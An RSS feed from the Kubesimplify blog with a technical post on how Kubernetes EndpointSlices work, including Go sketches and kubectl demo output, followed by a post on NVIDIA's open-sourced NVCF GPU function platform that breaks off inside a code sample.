<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[Kubesimplify]]></title><description><![CDATA[On a Mission to simplify AI and Cloud Native for everyone!]]></description><link>https://blog.kubesimplify.com</link><image><url>https://cdn.hashnode.com/res/hashnode/image/upload/v1649087678065/oZZJ9QpqX.png</url><title>Kubesimplify</title><link>https://blog.kubesimplify.com</link></image><generator>RSS for Node</generator><lastBuildDate>Tue, 12 May 2026 06:38:19 GMT</lastBuildDate><atom:link href="https://blog.kubesimplify.com/rss.xml" rel="self" type="application/rss+xml"/><language><![CDATA[en]]></language><ttl>60</ttl><item><title><![CDATA[How Kubernetes EndpointSlices Actually Work (and Why Endpoints Had to Die)]]></title><description><![CDATA[A Service has no pod IPs in it. We covered that in the last post. So somewhere, something is keeping a list of every pod IP that matches the Service's label selector. So that kube-proxy can program th]]></description><link>https://blog.kubesimplify.com/how-kubernetes-endpointslices-actually-work-and-why-endpoints-had-to-die</link><guid isPermaLink="true">https://blog.kubesimplify.com/how-kubernetes-endpointslices-actually-work-and-why-endpoints-had-to-die</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[#endpointslices]]></category><category><![CDATA[networking]]></category><category><![CDATA[kube-proxy]]></category><category><![CDATA[Devops]]></category><dc:creator><![CDATA[Saiyam Pathak]]></dc:creator><pubDate>Mon, 11 May 2026 17:09:39 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/35ce64fb-8023-4898-b97c-6265d74e56d2.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>A Service has no pod IPs in it. We covered that in the last post. 
So somewhere, something is keeping a list of every pod IP that matches the Service's label selector. So that kube-proxy can program the kernel. So that CoreDNS can answer a Headless lookup. <strong>That somewhere is an EndpointSlice.</strong></p>
<p>This post walks the full picture: why the original <code>Endpoints</code> API had to be replaced, what is actually inside a slice, the three conditions that decide whether traffic flows to a pod, how zone-aware routing works through topology hints, who watches these things, and a real cluster demo at the bottom. Every claim is verified against <code>kubernetes/kubernetes</code> 1.36 source and CoreDNS 1.11.</p>
<p><a class="embed-card" href="https://youtu.be/_MJ1ou-Oj-s?si=Zi9vHbI_Bf_snVlo">https://youtu.be/_MJ1ou-Oj-s?si=Zi9vHbI_Bf_snVlo</a></p>

<h2>TL;DR</h2>
<ol>
<li><p><strong>Why slices exist.</strong> The legacy <code>Endpoints</code> object held every backend pod IP in one blob. Three thousand pods meant a giant object, watched by every kube-proxy on every node, rewritten on every change. It did not scale. EndpointSlices (GA in 1.21) replaced it with many small objects capped at 100 endpoints each.</p>
</li>
<li><p><strong>What is in a slice.</strong> An <code>addressType</code> (<code>IPv4</code> or <code>IPv6</code>, plus an unused <code>FQDN</code>), a list of endpoints with conditions and a <code>targetRef</code> pointing back at the pod, a list of ports, and labels that bind it to its parent Service.</p>
</li>
<li><p><strong>Three conditions.</strong> <code>Serving</code> tracks the readiness probe. <code>Terminating</code> flips during pod deletion. <code>Ready</code> is the convenience flag — shorthand for <code>Serving=true AND Terminating=false</code>. The split exists so kube-proxy can keep using a draining pod that still answers requests.</p>
</li>
<li><p><strong>Topology hints.</strong> Each endpoint can carry a <code>hints.forZones</code> field. kube-proxy on a node in <code>us-east-1a</code> prefers endpoints hinted for that zone. Same-zone routing means lower latency and lower cross-zone traffic costs.</p>
</li>
<li><p><strong>Two watchers.</strong> kube-proxy and CoreDNS both watch EndpointSlices via the <code>discovery/v1</code> API. kube-proxy reprograms iptables. CoreDNS uses them to answer Headless-Service lookups directly with pod IPs.</p>
</li>
</ol>
<h2>Part 1: Why EndpointSlices exist</h2>
<p>To understand why EndpointSlices exist, look at what came before.</p>
<p>There was just one object per Service. The <code>Endpoints</code> object. One blob, with every backend pod IP inside it. Three pods? Fine. Three thousand pods? <strong>That object becomes huge.</strong> Every kube-proxy on every node watches it. Every change rewrites the entire blob. Every node re-receives the entire blob. The api-server chokes. kube-proxy chokes. The system did not scale.</p>
<p>The fix landed in Kubernetes 1.16 (alpha) and went GA in 1.21. Instead of one giant <code>Endpoints</code> object, you get many small <code>EndpointSlice</code> objects. Each one is capped at 100 endpoints by default. Add a pod, only the slice it lands in gets rewritten. Watchers only re-process that one slice. The api-server only ships one small object on the wire. <strong>Linear scaling instead of quadratic blow-up.</strong></p>
<p>The original <code>Endpoints</code> API is officially deprecated as of 1.33 (KEP-4974). It still gets written for backward compatibility, but EndpointSlices are the source of truth now, and modern controllers read slices, not the legacy object.</p>
<h2>Part 2: What is actually inside a slice</h2>
<p>When you create a Service, the EndpointSlice controller wakes up. It runs inside <code>kube-controller-manager</code>. It watches Services. It watches Pod changes. When either changes, it reconciles.</p>
<p>For each pod in the namespace that matches the Service's label selector and has an IP assigned, the controller builds a slice entry: pod IP, pod node, ports, conditions. Pods that are not ready are still listed, with <code>Ready</code> set to false, which is why the conditions matter. Then it writes or updates one or more <code>EndpointSlice</code> objects. The api-server validates them and writes them to etcd. kube-proxy and CoreDNS watch them via the api-server. Done.</p>
<p>A trimmed <code>kubectl describe endpointslice</code> looks like this:</p>
<pre><code class="language-plaintext">Name:         my-service-x29k9
Labels:       kubernetes.io/service-name=my-service
              endpointslice.kubernetes.io/managed-by=endpointslice-controller.k8s.io
AddressType:  IPv4
Ports:
  Name    Port  Protocol
  http    80    TCP
Endpoints:
  - Addresses:  10.244.1.42
    Conditions:
      Ready:        true
      Serving:      true
      Terminating:  false
    TargetRef:    Pod/nginx-abc-123
    NodeName:     worker
  - Addresses:  10.244.2.18
    Conditions:
      Ready:        true
      Serving:      true
      Terminating:  false
    TargetRef:    Pod/nginx-abc-456
    NodeName:     worker2
</code></pre>
<p>Five fields are doing all the work:</p>
<ul>
<li><p><code>addressType</code><strong>.</strong> <code>IPv4</code> or <code>IPv6</code>. Dual-stack Services get two slices, one for each protocol. There's a third value, <code>FQDN</code>, in the API enum, but no Kubernetes component implements behavior for it. We'll come back to this.</p>
</li>
<li><p><code>endpoints[]</code><strong>.</strong> The list. Each entry has <code>addresses</code> (the pod IP), <code>conditions</code> (the three flags we'll cover next), <code>targetRef</code> (a pointer back at the source Pod), and <code>nodeName</code> (used by topology routing).</p>
</li>
<li><p><code>ports[]</code><strong>.</strong> The Service's exposed ports, copied here so kube-proxy doesn't have to cross-reference.</p>
</li>
<li><p><code>labels</code><strong>.</strong> <code>kubernetes.io/service-name</code> is the binding label that tells every consumer which Service this slice belongs to. The <code>managed-by</code> label distinguishes slices written by the core controller from slices written by other controllers (Cilium, Antrea, MCS-API).</p>
</li>
<li><p><code>ownerReferences</code><strong>.</strong> Points at the parent Service so deletion cascades naturally.</p>
</li>
</ul>
<h3>Why 100?</h3>
<p>100 endpoints per slice is the default cap. It is a deliberate tradeoff.</p>
<p>Smaller slices mean more API objects in etcd but fewer bytes per watch event. Bigger slices mean fewer objects but every change rewrites a larger blob. 100 sits in the middle. A Service with 3 pods has 1 slice. A Service with 300 pods has 3. A Service with 3000 pods has 30. The cap is configurable up to 1000 via the <code>--max-endpoints-per-slice</code> flag on <code>kube-controller-manager</code>, but most clusters never need to touch it.</p>
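<p>The arithmetic is just ceiling division. Here is a minimal Go sketch, assuming the controller packs every slice full. The name <code>slicesNeeded</code> is made up for illustration, and the real controller can leave slices partially filled to avoid rewriting them, so treat the result as a lower bound.</p>
<pre><code class="language-go">package main

import "fmt"

// slicesNeeded returns how many EndpointSlices a Service needs for a given
// endpoint count, assuming every slice is packed full (ceiling division).
// Hypothetical helper, not part of any Kubernetes package.
func slicesNeeded(endpoints, maxPerSlice int) int {
    if endpoints == 0 {
        return 1 // the empty placeholder slice
    }
    return (endpoints + maxPerSlice - 1) / maxPerSlice
}

func main() {
    for _, n := range []int{3, 300, 3000} {
        fmt.Printf("%d endpoints: %d slice(s)\n", n, slicesNeeded(n, 100))
    }
}
</code></pre>
<p>Raising the cap to 1000 in the same function shows the tradeoff: 3000 endpoints fit in 3 slices, but every pod change rewrites an object ten times larger.</p>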
<h2>Part 3: The three conditions</h2>
<p>Each endpoint has three condition flags. <code>Ready</code>. <code>Serving</code>. <code>Terminating</code>. They sound similar. They mean different things. And they decide whether traffic actually goes to that pod.</p>
<h3>Serving</h3>
<p><code>Serving</code> tracks the readiness probe. If the pod's readiness probe passes, <code>Serving = true</code>. The pod is willing and able to handle requests. kube-proxy can route traffic here.</p>
<p>This is the underlying truth flag. <code>Ready</code> is derived from it, combined with <code>Terminating</code>.</p>
<h3>Terminating</h3>
<p><code>Terminating = true</code> means the pod is being deleted. The EndpointSlice controller observes the pod's <code>deletionTimestamp</code> and flips this flag.</p>
<p>kube-proxy normally stops sending <strong>new</strong> connections to a Terminating endpoint, so the pod can drain in peace. But there's a safety fallback: <strong>if a Service has no Ready endpoints left</strong>, kube-proxy keeps routing traffic to the Terminating endpoints that are still Serving, rather than dropping connections. This is the graceful-shutdown safeguard that stops a class of zero-downtime rollout bugs where the old pods are gone before the new pods are ready.</p>
<h3>Ready</h3>
<p><code>Ready</code> is the convenience flag. It is shorthand for <code>Serving = true AND Terminating = false</code>. A normal, accepting-traffic, not-being-deleted pod has <code>Ready = true</code>.</p>
<p>The reason the two flags are split: a pod <strong>can</strong> be Serving but not Ready, during graceful shutdown. It still answers requests, but it's being drained. This split was added so kube-proxy can make a smart decision: don't pick this pod for new connections, but keep any in-flight ones going. Without <code>Serving</code> as a separate flag, draining pods would be a much rougher transition.</p>
<table>
<thead>
<tr>
<th>State</th>
<th>Serving</th>
<th>Terminating</th>
<th>Ready</th>
<th>Routing</th>
</tr>
</thead>
<tbody><tr>
<td>Normal pod accepting traffic</td>
<td>true</td>
<td>false</td>
<td>true</td>
<td>yes</td>
</tr>
<tr>
<td>Pod failing readiness</td>
<td>false</td>
<td>false</td>
<td>false</td>
<td>no</td>
</tr>
<tr>
<td>Pod being drained</td>
<td>true</td>
<td>true</td>
<td>false</td>
<td>in-flight only, no new</td>
</tr>
<tr>
<td>Pod being killed</td>
<td>false</td>
<td>true</td>
<td>false</td>
<td>no</td>
</tr>
</tbody></table>
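<p>The table can be read as a small decision function. A hedged sketch in Go: <code>Conditions</code> and <code>pickBackends</code> are illustrative names, not the <code>discovery/v1</code> structs or kube-proxy's actual code, and the fallback only mirrors the behavior described above.</p>
<pre><code class="language-go">package main

import "fmt"

// Conditions is a simplified stand-in for the per-endpoint flags.
// The real API type uses optional booleans and stores Ready explicitly.
type Conditions struct {
    Serving     bool
    Terminating bool
}

// Ready derives the convenience flag: serving and not terminating.
func (c Conditions) Ready() bool {
    if c.Terminating {
        return false
    }
    return c.Serving
}

// pickBackends returns the indexes that may receive new connections:
// Ready endpoints if there are any, otherwise the draining endpoints
// that are still Serving (the graceful-shutdown fallback).
func pickBackends(eps []Conditions) []int {
    var ready, draining []int
    for i, c := range eps {
        switch {
        case c.Ready():
            ready = append(ready, i)
        case c.Serving: // serving but terminating
            draining = append(draining, i)
        }
    }
    if len(ready) != 0 {
        return ready
    }
    return draining
}

func main() {
    // One normal pod, one draining pod: only the normal pod is picked.
    fmt.Println(pickBackends([]Conditions{
        {Serving: true},
        {Serving: true, Terminating: true},
    }))
    // Every pod terminating: fall back to the one that still serves.
    fmt.Println(pickBackends([]Conditions{
        {Serving: true, Terminating: true},
        {Serving: false, Terminating: true},
    }))
}
</code></pre>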
<h2>Part 4: AddressType, and the FQDN edge case</h2>
<p>The API defines three address types:</p>
<pre><code class="language-go">// k8s.io/api/discovery/v1/types.go
const (
    AddressTypeIPv4 = AddressType(v1.IPv4Protocol)
    AddressTypeIPv6 = AddressType(v1.IPv6Protocol)
    AddressTypeFQDN = AddressType("FQDN")
)
</code></pre>
<p>In practice, you only ever see two. Dual-stack Services produce two slices, one with <code>addressType: IPv4</code> and one with <code>addressType: IPv6</code>. Same Service, same conditions, different protocol.</p>
<p><code>FQDN</code> is a constant the API exposes. <strong>No core Kubernetes component implements behavior for it.</strong> The same <code>types.go</code> file states it directly:</p>
<blockquote>
<p>"The syntax and semantics of other addressType values are not defined. This must contain at least one address but no more than 100. EndpointSlices generated by the EndpointSlice controller will always have exactly 1 address."</p>
</blockquote>
<p>So <code>FQDN</code> is reserved space in the API. The EndpointSlice controller never produces it. kube-proxy doesn't program rules for it. CoreDNS doesn't resolve from it. If you create one manually, nothing happens.</p>
<p>It's there for hypothetical extensions: a controller could write FQDN-typed slices for things like external services, and a custom data plane could consume them. In a default cluster, treat the AddressType field as a binary IPv4-or-IPv6 flag.</p>
<h2>Part 5: Topology hints (zone-aware routing)</h2>
<p>This is the part most people don't know about.</p>
<p>Each endpoint can carry a <code>hints</code> field with <code>forZones</code>: a list of zones this endpoint is preferred for. kube-proxy reads these hints. When traffic originates on a node in <code>us-east-1a</code>, kube-proxy on that node prefers endpoints hinted for <code>us-east-1a</code>. <strong>Same-zone routing. Lower latency. Lower cross-zone egress costs</strong>, which on AWS or GCP can be a real line item on the bill.</p>
<h3>Where hints come from</h3>
<p>The EndpointSlice controller writes them. It reads the pod's node label <code>topology.kubernetes.io/zone</code>. If the Service has the annotation:</p>
<pre><code class="language-yaml">metadata:
  annotations:
    service.kubernetes.io/topology-mode: Auto
</code></pre>
<p>then the controller computes hints automatically, balancing endpoints across zones, weighted by each zone's allocatable CPU. The goal: each zone serves traffic proportional to its compute capacity. If <code>us-east-1a</code> has 60% of the cluster's CPU, it gets ~60% of the endpoints hinted for that zone.</p>
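<p>The proportional idea is easy to check by hand. A minimal Go sketch, assuming a strict CPU-proportional split. <code>idealShare</code> and the zone numbers are hypothetical, and the real controller applies extra rules on top of this.</p>
<pre><code class="language-go">package main

import (
    "fmt"
    "sort"
)

// idealShare returns how many endpoints each zone would be hinted for if
// hints were split strictly in proportion to allocatable CPU.
// Hypothetical helper for illustration only.
func idealShare(cpuByZone map[string]float64, endpoints int) map[string]float64 {
    var total float64
    for _, cpu := range cpuByZone {
        total += cpu
    }
    out := make(map[string]float64, len(cpuByZone))
    if total == 0 {
        return out // no capacity data, nothing to apportion
    }
    for zone, cpu := range cpuByZone {
        out[zone] = float64(endpoints) * cpu / total
    }
    return out
}

func main() {
    // Made-up cluster: 60% of CPU in us-east-1a, 20% in each other zone.
    cpu := map[string]float64{"us-east-1a": 60, "us-east-1b": 20, "us-east-1c": 20}
    share := idealShare(cpu, 10)

    zones := make([]string, 0, len(share))
    for z := range share {
        zones = append(zones, z)
    }
    sort.Strings(zones) // map order is random, so sort for stable output
    for _, z := range zones {
        fmt.Printf("%s: %.1f of 10 endpoints\n", z, share[z])
    }
}
</code></pre>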
<p>Hints do not have to come from the core controller. Custom controllers that manage their own EndpointSlices can write <code>hints.forZones</code> directly. The auto mode is what most clusters use.</p>
<h3>When hints don't fire</h3>
<p>Auto mode has safety bailouts. If the zone distribution is too unbalanced, say one zone has all the pods, the controller drops hints entirely rather than route everything to that zone. kube-proxy without hints falls back to its normal behavior of spreading traffic across every endpoint in the cluster. This is intentional: same-zone routing is only safe when every zone has enough capacity to handle its own traffic.</p>
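<p>The consumer side has its own fallback. Here is a simplified Go sketch of how a proxy could filter by zone. <code>Endpoint</code> and <code>filterByZone</code> are illustrative names, and the two fallback rules (any endpoint missing a hint, or no endpoint hinted for this zone) are my reading of the documented safeguards, not a copy of kube-proxy's code.</p>
<pre><code class="language-go">package main

import (
    "fmt"
    "slices"
)

// Endpoint is a trimmed-down stand-in for a slice entry.
type Endpoint struct {
    IP       string
    ForZones []string // empty means no hint was written
}

// filterByZone keeps the endpoints hinted for nodeZone. It returns the
// full list when hints are incomplete or nothing is hinted for the zone.
func filterByZone(nodeZone string, eps []Endpoint) []Endpoint {
    var local []Endpoint
    for _, ep := range eps {
        if len(ep.ForZones) == 0 {
            return eps // a missing hint disables zone filtering
        }
        if slices.Contains(ep.ForZones, nodeZone) {
            local = append(local, ep)
        }
    }
    if len(local) == 0 {
        return eps // nothing hinted for this zone, use everything
    }
    return local
}

func main() {
    eps := []Endpoint{
        {IP: "10.244.1.42", ForZones: []string{"us-east-1a"}},
        {IP: "10.244.2.18", ForZones: []string{"us-east-1b"}},
    }
    fmt.Println(filterByZone("us-east-1a", eps)) // same-zone endpoint only
    fmt.Println(filterByZone("us-east-1c", eps)) // no match, all endpoints
}
</code></pre>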
<h2>Part 6: Who watches EndpointSlices</h2>
<p>Two consumers. Both watch the same API.</p>
<h3>kube-proxy</h3>
<p>kube-proxy runs as a DaemonSet on every node. It has two informers: one on Services, one on EndpointSlices. When a slice changes, it diffs the new state against the kernel's current rules, then batches the changes into a single <code>iptables-restore</code> (or an nftables transaction when running the nftables backend, GA since 1.33). The whole rule set is replaced as one transaction.</p>
<p>Three nodes, three independent reprograms, all in parallel. Total time on a normal cluster: milliseconds per change.</p>
<h3>CoreDNS</h3>
<p>CoreDNS watches EndpointSlices through its <code>kubernetes</code> plugin. From <code>coredns/plugin/kubernetes/controller.go</code>:</p>
<pre><code class="language-go">import discovery "k8s.io/api/discovery/v1"

epLister, epController := object.NewIndexerInformer(
    &amp;cache.ListWatch{
        ListFunc:  endpointSliceListFunc(...),
        WatchFunc: endpointSliceWatchFunc(...),
    },
    &amp;discovery.EndpointSlice{},
    ...
)
</code></pre>
<p>For a normal Service, CoreDNS returns the ClusterIP — it doesn't actually need the slice to answer that query. The slices matter for <strong>Headless Services</strong> (<code>clusterIP: None</code>). For those, CoreDNS returns the pod IPs from the slice directly, no virtual IP, no kube-proxy in the path. This is how StatefulSets get per-pod DNS: <code>pod-0.my-statefulset.default.svc.cluster.local</code> resolves to one specific pod IP, pulled out of the slice.</p>
<p>Both watchers are list-watch. They get the initial state from a <code>List</code>, then incremental <code>ADDED</code> / <code>MODIFIED</code> / <code>DELETED</code> events via the watch stream. No polling.</p>
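<p>The list-watch pattern boils down to a local cache plus a stream of deltas. A minimal sketch in plain Go, with no client-go dependency: the <code>Event</code> type and <code>apply</code> function are simplified stand-ins I made up, since real watch events carry full <code>EndpointSlice</code> objects.</p>
<pre><code class="language-go">package main

import "fmt"

// Event is a simplified stand-in for a watch event.
type Event struct {
    Type string // "ADDED", "MODIFIED", or "DELETED"
    Name string // slice name
    IPs  []string
}

// apply folds one watch event into the local cache.
func apply(cache map[string][]string, ev Event) {
    switch ev.Type {
    case "ADDED", "MODIFIED":
        cache[ev.Name] = ev.IPs
    case "DELETED":
        delete(cache, ev.Name)
    }
}

func main() {
    // Initial List: the starting state.
    cache := map[string][]string{"nginx-x29k9": {"10.244.1.42"}}

    // Watch stream: incremental changes only, no polling.
    events := []Event{
        {Type: "MODIFIED", Name: "nginx-x29k9", IPs: []string{"10.244.1.42", "10.244.2.18"}},
        {Type: "ADDED", Name: "nginx-fz4mp", IPs: []string{"10.244.3.7"}},
        {Type: "DELETED", Name: "nginx-fz4mp"},
    }
    for _, ev := range events {
        apply(cache, ev)
    }
    fmt.Println(cache)
}
</code></pre>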
<h2>Part 7: A real cluster demo</h2>
<p>Let me show this on a real cluster. Three workers, a kind v1.35.1 cluster:</p>
<pre><code class="language-bash">$ kubectl get nodes
NAME                 STATUS   ROLES           AGE
kind-control-plane   Ready    control-plane   2m
kind-worker          Ready    &lt;none&gt;          2m
kind-worker2         Ready    &lt;none&gt;          2m
kind-worker3         Ready    &lt;none&gt;          2m
</code></pre>
<p>Apply a Deployment with three nginx pods and a Service:</p>
<pre><code class="language-bash">$ kubectl create deployment nginx --image=nginx --replicas=3
$ kubectl expose deployment nginx --port=80
</code></pre>
<h3>Three pods</h3>
<pre><code class="language-bash">$ kubectl get endpointslices -l kubernetes.io/service-name=nginx
NAME          ADDRESSTYPE   PORTS   ENDPOINTS                                     AGE
nginx-x29k9   IPv4          80      10.244.1.42,10.244.2.18,10.244.3.7            5s
</code></pre>
<p>One slice. Three endpoints. Each pod IP, each node, each Ready. Exactly what we expect for three pods.</p>
<p>Worth noticing: the slice itself was actually created <strong>the moment the Service was</strong>, as an empty placeholder. As each pod transitioned to Ready, the controller filled it in and updated the same slice object. The placeholder pattern means downstream watchers always have something to bind to, even before any pod is ready.</p>
<h3>Scale to 50</h3>
<pre><code class="language-bash">$ kubectl scale deployment nginx --replicas=50
</code></pre>
<p>Watch the slice:</p>
<pre><code class="language-bash">$ kubectl get endpointslices -l kubernetes.io/service-name=nginx
NAME          ADDRESSTYPE   PORTS   ENDPOINTS                                     AGE
nginx-x29k9   IPv4          80      10.244.1.42,10.244.1.43,... (50 entries)      2m
</code></pre>
<p>Still one slice. Fifty endpoints. Under the 100-endpoint default cap. kube-proxy on every node reprogrammed. CoreDNS, if this were a Headless Service, would now return all fifty IPs in the DNS answer.</p>
<h3>Scale to 200 — the slice splits</h3>
<pre><code class="language-bash">$ kubectl scale deployment nginx --replicas=200
</code></pre>
<pre><code class="language-bash">$ kubectl get endpointslices -l kubernetes.io/service-name=nginx
NAME          ADDRESSTYPE   PORTS   ENDPOINTS                       AGE
nginx-x29k9   IPv4          80      ... (100 entries)               3m
nginx-fz4mp   IPv4          80      ... (100 entries)               12s
</code></pre>
<p><strong>Two slices.</strong> One with 100 endpoints. One with another 100. kube-proxy reads both, stitches the rules together, and the Service has two hundred backends. The split is invisible to anyone using the Service. You curl one ClusterIP and the kernel picks one of the 200 pods.</p>
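<p>The stitching is driven by the <code>kubernetes.io/service-name</code> label. A rough Go sketch of the idea, with a made-up <code>Slice</code> type and <code>backendsFor</code> helper rather than kube-proxy's real data structures:</p>
<pre><code class="language-go">package main

import "fmt"

const serviceNameLabel = "kubernetes.io/service-name"

// Slice is a trimmed-down stand-in for an EndpointSlice.
type Slice struct {
    Labels    map[string]string
    Endpoints []string
}

// backendsFor flattens every slice labeled for the Service into one list.
func backendsFor(service string, all []Slice) []string {
    var out []string
    for _, s := range all {
        if s.Labels[serviceNameLabel] == service {
            out = append(out, s.Endpoints...)
        }
    }
    return out
}

func main() {
    slices := []Slice{
        {Labels: map[string]string{serviceNameLabel: "nginx"}, Endpoints: []string{"10.244.1.42", "10.244.2.18"}},
        {Labels: map[string]string{serviceNameLabel: "nginx"}, Endpoints: []string{"10.244.3.7"}},
        {Labels: map[string]string{serviceNameLabel: "other"}, Endpoints: []string{"10.244.9.9"}},
    }
    fmt.Println(backendsFor("nginx", slices))
}
</code></pre>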
<h3>Rolling update</h3>
<p>Now do a rolling update — change the image, watch the slices in real time:</p>
<pre><code class="language-bash">$ kubectl set image deployment nginx nginx=nginx:1.27
$ kubectl get endpointslices -l kubernetes.io/service-name=nginx --watch
</code></pre>
<p>You see endpoints transition through every state we covered. Pods go <code>Terminating = true</code>. New pods land <code>Serving = true</code> once readiness passes. Slices update. kube-proxy reprograms on every change.</p>
<p>Total reprogramming time across the rolling update? <strong>A few seconds, distributed across nodes.</strong> The Service IP never changes. Traffic keeps flowing. End users see nothing.</p>
<h2>Wrap</h2>
<p>So that is the EndpointSlice. The bridge between a Service definition and the kernel rules that route real traffic.</p>
<p>One controller writes them. kube-proxy and CoreDNS watch them. Capped at 100 by default. Conditions for graceful shutdown. Topology hints for zone-aware routing. The placeholder pattern so downstream watchers always have something to bind to.</p>
<p>It's what makes Kubernetes Services scale to thousands of pods without falling over. Most people use Services every day and never think about the slices underneath. That's the point — the abstraction works.</p>
]]></content:encoded></item><item><title><![CDATA[NVCF Is Now Open Source: Inside NVIDIA's GPU Function Platform]]></title><description><![CDATA[NVIDIA just open-sourced the full NVCF platform under Apache 2.0. Not a thin SDK, not a client library. The actual control plane, invocation plane, compute plane, CLIs, Helm charts, and database migra]]></description><link>https://blog.kubesimplify.com/nvcf-is-now-open-source-inside-nvidia-s-gpu-function-platform</link><guid isPermaLink="true">https://blog.kubesimplify.com/nvcf-is-now-open-source-inside-nvidia-s-gpu-function-platform</guid><category><![CDATA[NVIDIA]]></category><category><![CDATA[Kubernetes]]></category><category><![CDATA[GPU]]></category><category><![CDATA[Open Source]]></category><category><![CDATA[cloudnative]]></category><dc:creator><![CDATA[Saiyam Pathak]]></dc:creator><pubDate>Mon, 11 May 2026 13:04:44 GMT</pubDate><enclosure url="https://raw.githubusercontent.com/saiyam1814/blogkit/main/covers/nvcf-deep-dive-cover.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>NVIDIA just open-sourced the full NVCF platform under Apache 2.0. Not a thin SDK, not a client library. The actual control plane, invocation plane, compute plane, CLIs, Helm charts, and database migrations, all in one monorepo at <a href="https://github.com/nvidia/nvcf">github.com/nvidia/nvcf</a>.</p>
<p>NVCF powers infrastructure behind services like <code>build.nvidia.com</code> and NVIDIA-hosted inference workflows across GPU cloud providers and DGX Cloud environments. Now you can run the whole thing yourself and read every line that makes it work.</p>
<p>Let’s break down how the platform actually works.</p>
<hr />
<h2>What NVCF Actually Is</h2>
<p>NVCF stands for NVIDIA Cloud Functions. The original managed service let you register a Docker container or Helm chart, specify a GPU type, and NVIDIA handled everything: routing, queueing, autoscaling, multi-tenant isolation. GPU cloud partners like CoreWeave ran the NVIDIA Cluster Agent on their Kubernetes clusters so their GPUs could serve functions while NVIDIA owned the control plane.</p>
<p>The April 2026 Apache 2.0 release publishes that control plane. The previous repos (<code>NVIDIA/nvidia-cloud-functions</code>, <code>NVIDIA/nvcf-go</code>) are now archived. This monorepo is the one place everything lives.</p>
<p>One honest caveat: the control plane images are currently distributed via NVIDIA's NGC registry under the <code>nvcf-onprem</code> org. You need NGC access to deploy the full stack today. The source code is all Apache 2.0 and inspectable, but the deployable bundle still goes through NGC while <a href="https://github.com/NVIDIA/nvcf/issues/12">issue #12</a> (full OSS build) is open. I opened <a href="https://github.com/NVIDIA/nvcf/issues/14">issue #14</a> asking for a community contributor path.</p>
<hr />
<h2>Three-Plane Architecture</h2>
<p>The entire platform is built around three independently scalable planes connected through NATS JetStream.</p>
<img src="https://raw.githubusercontent.com/saiyam1814/blogkit/main/covers/nvcf-01-architecture.png" alt="NVCF Three-Plane Architecture" style="display:block;margin:0 auto" />

<p><strong>Control Plane</strong> runs on a dedicated Kubernetes cluster and owns function lifecycle, autoscaling decisions, and secrets management. Key services:</p>
<ul>
<li><p><code>function-autoscaler</code> (Rust): runs a 30-second scaling loop, reads utilization from VictoriaMetrics, writes decisions to Cassandra, calls the NVCF API to set desired instance counts</p>
</li>
<li><p><code>helm-reval</code> (Go): validates OCI-referenced Helm charts before the compute plane deploys them</p>
</li>
<li><p>OpenBao (Apache 2.0 Vault fork): all function secrets encrypted at rest, injected at runtime via the ess-agent sidecar</p>
</li>
<li><p>Cassandra: persistent state and distributed locks for the autoscaler</p>
</li>
</ul>
<p><strong>Invocation Plane</strong> sits between every caller and every GPU worker. Nothing bypasses it:</p>
<ul>
<li><p><code>http-invocation</code> (Rust / Axum): receives HTTP/gRPC requests, publishes to NATS JetStream, handles async polling</p>
</li>
<li><p><code>llm-gateway</code> (Go): OpenAI-compatible API with token-aware rate limiting via embedded Olric cache</p>
</li>
<li><p><code>grpc-proxy</code> (Go): forwards gRPC calls to function instances</p>
</li>
<li><p><code>ratelimiter</code> (Go): per-function rate limiting using Olric distributed cache</p>
</li>
<li><p><code>nats-auth-callout</code> (Go): NATS authentication with NKey, OIDC, and webhook strategies</p>
</li>
</ul>
<p><strong>Compute Plane</strong> is one NVCA (NVIDIA Cluster Agent) operator per GPU cluster. NVCA registers the cluster with the control plane, consumes NATS messages, and manages pod lifecycle.</p>
<hr />
<h2>How a Single Request Flows</h2>
<img src="https://raw.githubusercontent.com/saiyam1814/blogkit/main/covers/nvcf-02-request-flow.png" alt="Request Lifecycle" style="display:block;margin:0 auto" />

<p>Every invocation follows this path, verified against the source code:</p>
<ol>
<li><p>Caller posts to <code>POST /v2/nvcf/pexec/functions/{id}</code></p>
</li>
<li><p><code>http-invocation</code> checks rate via <code>ratelimiter</code> gRPC</p>
</li>
<li><p>Request published to NATS stream: <code>Create.NVCA.*.{clusterID}.*.*</code> (from <code>nvca/pkg/queue/nats/client.go</code>)</p>
</li>
<li><p>NVCA queue manager consumes the message</p>
</li>
<li><p><code>ICMSRequest</code> Kubernetes CR created (deduplication by NATS sequence)</p>
</li>
<li><p>MiniService controller reconciles: creates Pod or applies Helm chart</p>
</li>
<li><p>Function pod connects back via <code>WorkerService</code> gRPC: <code>ConnectOnce</code></p>
</li>
<li><p>Response returns to the caller</p>
</li>
<li><p>On completion: <code>Terminate.NVCA.{clusterID}</code> triggers pod deletion and GC</p>
</li>
</ol>
<hr />
<h2>Scale-to-Zero: The NATS Buffer Approach</h2>
<p>This is the most important architectural decision in the whole codebase, and it is fundamentally different from how Knative handles scale-to-zero.</p>
<p>With Knative, requests can experience timeout or retry pressure during long scale-up events, especially for GPU workloads with heavy cold starts. That model works well for lightweight stateless HTTP services that initialize quickly. GPU inference workloads are different. Loading large models into VRAM can take tens of seconds or even minutes, making durable request buffering much more important.</p>
<p>NVCF uses NATS JetStream as a durable request buffer:</p>
<ol>
<li><p>Autoscaler drives desired instance count to 0. No pods running.</p>
</li>
<li><p>New request arrives. Published to NATS JetStream. Stream persists it durably.</p>
</li>
<li><p>Autoscaler detects queue depth &gt; 0. Sets desired instances to 1+.</p>
</li>
<li><p>NVCA receives creation message, launches pod.</p>
</li>
<li><p>Pod connects via WorkerService gRPC, pulls the buffered message.</p>
</li>
<li><p>Response returns through the still-open <code>http-invocation</code> connection.</p>
</li>
</ol>
<p>The request is never dropped. The caller waits longer on a cold start, but the request completes. This is only possible because the queue buffers it.</p>
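<p>The buffering logic can be modeled in a few lines. This is a toy Go simulation, not NVCF code: <code>Platform</code>, its fields, and its methods are invented for illustration, and an in-memory slice stands in for the durable JetStream stream.</p>
<pre><code class="language-go">package main

import "fmt"

// Platform is a toy model: queue stands in for the durable stream,
// desired for the instance count the autoscaler sets.
type Platform struct {
    queue   []string
    desired int
}

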